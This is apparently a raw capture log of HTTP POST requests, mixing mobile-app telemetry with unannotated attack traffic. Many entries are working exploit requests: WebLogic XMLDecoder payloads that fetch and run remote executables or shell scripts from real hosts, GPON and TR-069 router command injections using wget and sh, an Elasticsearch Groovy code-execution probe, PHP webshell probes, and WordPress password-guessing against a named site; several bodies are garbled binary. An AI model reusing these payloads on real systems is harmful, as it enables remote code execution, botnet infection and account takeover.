ÅGˇuÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î·/Y›∆√«∆fl
POST http://p-behacdn.ksmobile.net/du HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: p-behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 126
~?/3®ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcék∆¶iRĨc^9;∞êΩúqk`¶¥M<kZ&=:OdøúèïCiC*8kZ&=0OeBhGAhB*8kZ&=0OoAipaºóº’9jxË WKoBcp`B
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST http://ucus.ucweb.com/usquery.php HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.4; id; MI_4LTE) U2/1.0.0 UCBrowser/10.9.0.946 U2/1.0.0 Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 434
Host: ucus.ucweb.com
Connection: Keep-Alive
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.idc3389.top/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 809
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1037
Content-Type: multipart/form-data; boundary=4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
552312
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
2a443fb869f04039f51140ec7ccb7427
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv--
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Host: x.x.x.x
Content-Length: 0
Connection: Keep-Alive
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅQ˜ì«Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î@#Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=andrew
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST http://check.proxyradar.com/azenv.php?auth=149333774597&a=PSCMN&i=3168963859&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /GponForm/diag_Form?script/ HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Hello, World
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 126
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$(wget+http://46.243.189.101/w+-O+->+/tmp/w;sh+/tmp/w+gpon)&ipv=0
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=34106&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.native","des":"","sug":-1}]
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 575
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://217.147.169.230:4444/cve-2017-10271?target=http%3A%2F%2F64.137.220.15%3A80%2Fwls-wsat%2FCoordinatorPortType</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache
S/YNl4+eZAa3vwZYfNtW9HUKF9iabqp/HkKQHqRVezLH8Mx713lTJuUS7QVEUfl7jhmoEXJh0kJ1vV4WyoGrubiUcC9Xe46Or2QiMqRvn37/JoAaskcaKKmR1pwBu50F2xk9mwS6wM5VC4Dges2PAW5gwZ4ZmSeuLP2pJt7hbg/iEofouye6RpG86IS1SZ2fdrz5oyMbJVTrxT8SZ14JoTl+GPOqsGSONK2fbhtpl+TQ1PA2pJxP0NEBh5TDObVhUX5qfEtJZbh4gZtYQ1qnmT/zAqVH/3WJoM/KS8wAk5EIo6hoVCDDpD0aguTHaOvw6YQM+8JNE0nIQHe7Q23rDprrlkFNi+Vpj7Bq5MTvWXfCcplj8Ubpgw==
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
axa=die((string)(111111111*9));
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
RaQNyd2bZKf5dqF27GDjgzlfBakX7AhD55I7CaBTw/zcuMw+1tk8XK9wWDYcA6xWfQA7j76hIWf2O1b3y3RX38v7XjDMoGYrlq1sh6/n6HPNKSHuKpjq9egVgOmEgHBJru2lJ+VMA1V7UidHAX6427ac7G4EolM6EuvOq660PEoI8hXPo/b3dxZKqM91dG/CvWqQvb7tow4Q6XS0Gu+vbU8KpqPj2WXc9keSjclmDbpq1LRI0siwTsRDlgSGZt6eTQgCJKeI9TI+vkbGZryW2kdluXVwt7sr3VXo74yU1fCoIEkW2szRPdDGOJVlh/dou91cf9l/E7q05eyav3wFGHfCMlJXSW8liyA/h1chRKh4jwQyP0JB7si09remqnmFwMS8ODoQMR2H65gur9vxWuDTcSH9UPOQaPcMkW761CHrJQ17N11Z
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
eval=die((string)(111111111*9));
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache
EfMMyNrMMf6wsw4EF6gn/FCezPMBKJDyhF05IVn2Zcxn/gVuDjhB1FkT6LXAVfiTVfY72qQNAzh+vIJNMg/OLb4J2EMd7gfnzF2TlBiAkwOIEbQI2PD4e7S0NmzcLojM5oLwwZBSR7JrYem5ZnXwXZKRhAwXT1T2T3h2jVWikRtVU2USqzcSmRIx+NZymE+0eiD/07oHof5252ibRALk4azz0wnsbYW3nFVET59Qj+qULoUD99D0Itchjq4w4rZ7VHtlXpK+AgqIdfRRszEv4Alc+DwDUIuJtdkk4nl9HeRqqc5hVxeXmTiummX/ouRadwejEFFNw3951jHuKqHiNXhdmPnUe7RDdcFQUJJSpKwgFzk35pgSe1YUMapaMvI7dPtegCA8AVX5CsFpdCWjYAnoG8DlCi6JnwMQskVN+PpVVzx/sX2uONQj
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅI™cÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å®}fi›Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl
POST http://t17.proxy-checks.com/favicon.ico HTTP/1.1
Host: t17.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å˙PbÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001
POST http://t6.proxy-checks.com/favicon.ico HTTP/1.1
Host: t6.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å⁄‰¸,Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îN´3Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=test12
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST http://t8.proxy-checks.com/favicon.ico HTTP/1.1
Host: t8.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÜôOÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å…ùƒ4Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î,¥)Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache
log=jamesatchue&pwd=1qaz2wsx
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 23
Cache-Control: no-cache
log=admin&pwd=admin2012
POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache
Qfddx9zKbMYFxfxfVusMfz9rxeE7BYXX+lTkuFkhoOqUe8wWmfNjVzh6SyXQWSC5DTAWebKUaY+RL7t4ePZlnEka5pJgM0YMo/hcp4vl01q1YpSDafWzU6ZbGk3uMzL7QdCuyuY38dsLVbVl0IwTK8toxRpsQjqKDzDNEujXdeW3VCCOdIAJxaCy5Wpa5AC/OcT4XSI1MNVNypO0OQeyY6PIHB3k6Yf89yBuoMYRREvkmrmD93LMSassJgUcl9BCd/4a+uYgMtPguD1zbOSb0kiWK5P8ucqIOQeDGIHjhFnQvP3p1aCaJ9eALo7C07aep8ye9ndqatfjx7bkZng4yPnXwYvxqHLMxsYE1+fbBcYzt15FjrQeqeosP17eJ+SzSGAiRIPFNoOGIr6v
POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106
{"start":1495004165420,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST http://hydra.alibaba.com/utdid_uc_browser/get_aid/?auth[token]=c8bc6fdf9837b2cbc7a9ed011ca1327b&type=utdid&id=V3JxZrJFQuwDAMtgV%2FWSY7o6&aid= HTTP/1.1
Content-Length: 0
Host: hydra.alibaba.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 416
Cache-Control: no-cache
FKdelYudZBZuizKcxr53yaabCB27wOoUXr2svM+EwLl2JaWKnUO7SSvqOg55GsTtPL+wKsNiR8LKO+4L+KtRPB0upENXYBaiohoWi76JYBClCSqa7Mnfcy4+BiVfJB+WCyd+/LajxNPYPkqhX3SkvlFYVpNHwXJGUyKxo2h5+eNhxdlYcWiVtszjd9kEEzwyHr+5hCoMk7AufElOGdgM8Cpr/jATfbCiXGupmnmg8XzubygXzGt/Nnmr99J+xU1jNDizvwfZeYOhawjuVzPZCym/vFv/Cgwa8WY1+MoToZpL661wljfkSU4m87FdiotLr/R490SNtpf5sabJS8ginCPBDY7wTNDLZfHJcow0FuaVe8uO+D697fFzXieSNkVVy/FELNviWT5fi5cyM3Uhu5A7MZ0UAQ==
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache
log=jamesatchue&pwd=1616
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://www.zhangyuntao.com.cn/IVUPro/todayScore.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: www.zhangyuntao.com.cn
Connection: Keep-Alive
Content-Length: 206
